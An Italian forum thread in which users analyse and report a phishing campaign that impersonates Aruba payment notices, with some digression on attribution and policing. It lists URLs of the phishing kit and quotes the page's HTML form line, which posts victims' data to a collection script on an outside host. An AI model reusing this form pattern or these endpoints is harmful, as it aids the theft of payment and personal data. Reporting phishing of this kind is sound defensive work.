Phishing pagamenti ARUBA! (su server Aruba)

[andrea_mac]

http://217.61.3.27/it/phpmailer/" onclick="window.open(this.href);return false;

http://217.61.3.27/it/phpmailer/PHPMailerAutoload.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/class.phpmailer.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/class.p ... roauth.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/class.p ... google.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/class.pop3.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/class.smtp.php" onclick="window.open(this.href);return false;
http://217.61.3.27/it/phpmailer/get_oauth_token.php" onclick="window.open(this.href);return false;

[iMaurizio]

Avete informato Aruba ?

[andrea_mac]

lo stiamo facendo

[faxus]

Comunque è un redirect dal sito
dance-group.ru

I delinquenti allora sono russi, come sempre...

Non si sa.

Non in questo caso.
Quel sito russo è una vittima degli hacker.
Ha l'unico torto di essere su un server non aggiornato.

Cosa che succede di frequente su server vecchi.
Se sul server c'è qualche sito vecchio che non supporta php 5.x gli altri non si possono aggiornare.
Dovrebbero cambiare server, in genere con aumento di spazio e servizi, ma anche del prezzo

... la cosa migliore è mandare segnalazioni anche a chi di dovere.

Se servisse a qualcosa...

L'origine dell'azione non è individuabile.
Partono da nodi anonimizzati e redirettati.
Gli IP non sono riconducibili perché quelli usati sono dei siti hackerati.

Inoltre "chi di dovere" non è definibile, né individuabile.
Perché non ci sono autorità.
La gestione dei domini e dei server è privata, anche se consortile.
Possono prendere solo provvedimenti civili se hanno le prove.

Gli organismi di polizia che possono indagare sono nazionali, in genere americani.
Come FBI, per esempio, e indagano solo per cose finanziarie di tipo monetario e altri interessi propri al potere che rappresentano.
Poi c'è l'Interpol, ma anche lì, a parte che incide meno, non cambia molto.

Per tutto il resto c'è un'inefficienza di fatto.
Le vie di indagine sono lentissime per via che si devono inoltrare richiesta da parte di organismi nazionali ad altri organismi nazionali.
A fronte dell'azione istantanea o di brevissima durata, ci sono mesi e mesi per qualcosa che sarà ovviamente inconcludente

[faxus]

Avete informato Aruba ? :coffee2:

lo stiamo facendo :D

Hohoho... Venite a vedere... C'è un'altro che ci informa che ci sono degli hacker in rete

[andrea_mac]

ecco dove passano i dati: sd-123370.dedibox.fr

<form action="http://sd-123370.dedibox.fr/ameli/snd.php" method="post" id="formulaire_saisie_adresse">

http://sd-123370.dedibox.fr/ameli/snd.php" onclick="window.open(this.href);return false;

http://networktools.nl/whois/dedibox.fr" onclick="window.open(this.href);return false;
registrar: ONLINE SAS
type: Isp Option 1
address: 8 Rue de la Ville l'Evêque
address: PARIS
country: FR

http://network-tools.com/default.asp?pr ... dedibox.fr" onclick="window.open(this.href);return false;
http://network-tools.com/default.asp?pr ... dedibox.fr" onclick="window.open(this.href);return false;

[utente eliminato]

Franz...

...se lasciassi il dominio .it un poliziotto postale mi prenderebbe per le orecchie.

La Polizia Postale italiana non può acciuffare i delinquenti stranieri, purtroppo.
Basta usare programmi come TunnelBear per appoggiare l'ip su altre nazioni...

io ho scoperto ciò per bypassare alcuni survey.
Le pubblicità degli Stati Uniti non chiedono dati sensibili.

Quello che mi puzza è appunto il continuo dominio .ru
perchè non .us o .be?

Anche su Facebook ci sono delinquenti con indirizzi email russe che si fingono belle donne...
...successivamente chiedono ricatti alle vittime minacciando di postare "strane" foto.

Naturalmente non ho provato io la cosa in prima persona.
A parte il fatto che ho una cara compagna e voglio restare nella mia buona fede, non lo farei neanche sotto minaccia di morte.
Ci sono stati semplicemente conoscenti che sono caduti in questa trappola.

[faxus]

... Quello che mi puzza è appunto il continuo dominio .ru
perchè non .us o .be?...

Chappy!

Basta, dai, non c'entra nulla il dominio o il server.
Non continuare a confondere hacker con hackerati.

Qui si sta discutendo su un'azione di phishing.
Nessun promotore di azioni di phishing private e tese ad estorcere informazioni private opera da propri server...

Non confondere con la spam, che è altra cosa.
Anche se a volte possono sembrare collegate

[CristalLina]

Naturalmente non ho provato io la cosa in prima persona. A parte il fatto che ho una cara compagna e voglio restare nella mia buona fede, non lo farei neanche sotto minaccia di morte.

[Kernel Panic]

Non so se c'entri qualcosa col topic, nel dubbio segnalo questo articolo >> http://bit.ly/2qjnS2E" onclick="window.open(this.href);return false;

[faxus]

Non so se c'entri qualcosa col topic, nel dubbio segnalo questo articolo >> http://bit.ly/2qjnS2E" onclick="window.open(this.href);return false;

Ne avevamo già parlato ed era una cosa che è durata un giorno, forse meno.

Il web è pieno di blog che assecondano la paranoia della gente.
Se quell'articolo fosse serio avrebbe poi rettificato o aggiornato la notizia.

Comunque c'entra poco

[spegahsheen]

Non so se c'entri qualcosa col topic, nel dubbio segnalo questo articolo >> http://bit.ly/2qjnS2E" onclick="window.open(this.href);return false;

Ciò non di meno interessante. Uso Firefox (anche se ha ricominciato a non funzionare la voce del menu Servizi ) e ho adottato il work around proposto.
Muchas gracias caballero.

[andrea_mac]

Non so se c'entri qualcosa col topic, nel dubbio segnalo questo articolo >> http://bit.ly/2qjnS2E" onclick="window.open(this.href);return false;

Ciò non di meno interessante. Uso Firefox (anche se ha ricominciato a non funzionare la voce del menu Servizi ) e ho adottato il work around proposto.
Muchas gracias caballero.

qui altre info utili: viewtopic.php?f=10&t=40789" onclick="window.open(this.href);return false;